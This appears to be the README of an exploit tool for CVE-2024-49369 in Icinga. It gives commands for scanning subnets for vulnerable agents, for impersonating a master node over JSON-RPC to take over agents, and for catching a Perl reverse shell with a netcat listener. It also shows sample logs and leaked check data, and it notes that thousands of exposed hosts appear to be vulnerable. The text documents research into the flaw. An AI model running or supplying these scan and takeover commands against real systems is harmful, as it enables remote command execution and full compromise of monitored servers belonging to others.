
Exploit tool for CVE-2024-49369 in Icinga, enabling subnet scanning, agent takeover via JSON-RPC impersonation, arbitrary command execution, and reverse shell.
This vulnerability leverages the Icinga JSON-RPC protocol to exploit monitored nodes running Icinga agents. By impersonating a Master/Satellite instance, attackers can potentially take over agents, execute arbitrary commands, or gain sensitive information.
To scan a subnet for vulnerable agents, run the following command:
python3 main.py scan --subnet 192.168.0.0/24 --vuln --batch 25
This scans the specified subnet in batches of 25 IPs. The tool sends an Icinga::HELLO message over the JSON-RPC protocol and identifies responding agents along with their versions.
If configuration and command execution is enabled on an endpoint (the default setting for monitored nodes with Icinga agents), an attacker can:
This can lead to full system compromise (depending on the service user) or limited access.
When the parent node is still connected, the exploit connections will look like this in the log:
[2024-12-11 09:13:03 -0500] information/ApiListener: New client connection for identity 'my_satellite' from [::ffff:192.168.0.1]:48120
[2024-12-11 09:13:04 -0500] information/ApiListener: New client connection for identity 'my_satellite' from [::ffff:192.168.0.1]:48124 (certificate validation failed: code 18: self signed certificate)
[2024-12-11 09:13:04 -0500] warning/ApiListener: No data received on new API connection from [::ffff:192.168.0.1]:48124 for identity 'my_satellite'. Ensure that the remote endpoints are properly configured in a cluster setup.
We can see this node is vulnerable to the attack as the warning for clusters is triggering, meaning that the current satellite is still connected, but this agent sees us as a valid parent.
Start a Netcat listener for the reverse shell:
nc -lvnp 9001
Launch the exploit:
python3 main.py exploit --host 192.168.0.5 --node-cn icinga_master --zone master --revip 192.168.0.1 --revport 9001
--host: Target agent's IP address.--node-cn: Common name of the Master/Satellite to impersonate.--zone: Targeted zone name. Default is master.--revip: Attacker's IP address for reverse shell.--revport: Attacker's port for reverse shell.This command initiates repeated connection attempts. Once the target agent disconnects from its current parent, the tool takes over, sending and receiving checks.
A Perl-based reverse shell is used as part of a new check created by the tool.
Even if configuration and command execution are disabled on the target, attackers may still glean sensitive data by observing the results of checks sent to the agent.
{
"jsonrpc": "2.0",
"method": "config::UpdateObject",
"params": {
"config": "object Downtime ...",
"name": "icinga-agent!load!9856e6b2...",
"type": "Downtime",
"version": 1733899523.67197
}
}
{
"jsonrpc": "2.0",
"method": "event::SetLastCheckStarted",
"params": {
"host": "icinga-agent",
"last_check_started": 1733899492.313578,
"service": "icinga"
},
"ts": 1733899492.313714
}
These responses may reveal sensitive configurations, scheduling data, or even the results of monitored services.
On Censys there are currently 24,003 hosts with a publicly facing Icinga port. Spot checks indicate that most hosts are still running a vulnerable version of Icinga.
This research builds on the work discussed in Icinga's blog.